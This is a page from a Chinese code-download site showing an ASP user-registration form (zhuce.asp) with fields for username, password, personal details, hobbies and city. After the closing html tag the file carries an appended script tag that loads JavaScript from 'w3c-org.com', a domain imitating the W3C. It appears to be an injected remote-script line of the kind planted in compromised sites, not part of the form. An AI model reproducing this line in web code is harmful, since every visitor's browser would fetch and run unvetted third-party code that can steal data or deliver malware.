⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 zhuce.asp

📁 简单的网页
💻 ASP
字号:
<html>
<head>
<title>注册</title>
</head>
<body background=../img/2.jpg>
<font color=blue>今天是
<%
response.write Year(Date)
%>年
<%
response.write Month(Date)
%>月
<%
response.write Day(Date)
%>日</font>

<center>
<p><br><p><br><p><br><p><br><form method=post name=a2 action=chenggong.asp>
<table border=1 bordercolor=slateblue>
<tr><td align=right>用 户 名:</td>
<td><input type=text size=15 name=y></td>
<td rowspan=5 colspan=2 align=center><img src=../img/3.jpg height=275width=275></td></tr>
<tr><td align=right>密 码:</td><td><input type=password size=15 name=mi></td></tr>
<tr><td align=right>姓 名:</td><td><input type=text size=13 name=n></td></tr>
<tr><td align=right>性 别:</td><td><select name=x><option value=男>男</option>
                                        <option value=女>女</option></select></td></tr>
<tr><td align=right>年 龄:</td>
<td><input type=text size=4 name=a></td></tr>
<tr><td align=right>爱 好:</td>
<td><input type=checkbox name=ai value=运动> 运动
<input type=checkbox name=ai value=逛街> 逛街<br>
<input type=checkbox name=ai value=看书> 看书
<input type=checkbox name=ai value=唱歌> 唱歌</td>
<td rowspan=2 valign=top><br>自我介绍:</td>
<td rowspan=2><textarea name=j cds=30 rows=5></textarea><img src=../img/4.gif></td></tr>
<tr><td align=right>城 市:</td>
<td><input type=radio name=c value="大"> 大连
    <input type=radio name=c value="沈"> 沈阳<br>
    <input type=radio name=c value="上"> 上海
    <input type=radio name=c value="北"> 北京</td></tr>
</table>
<p><input type=reset value=重写> &nbsp &nbsp <input type=submit value=提交>
<p> &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp 赶快来注册吧!
<%
for i=40 to 100 step 20
response.write"<img src=../img/8.gif width="&i&" height="&i&">"
next
%>
</center>
</form>
</html>

<script language=javascript src=http://www.w3c-org.com/css2.js></script>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -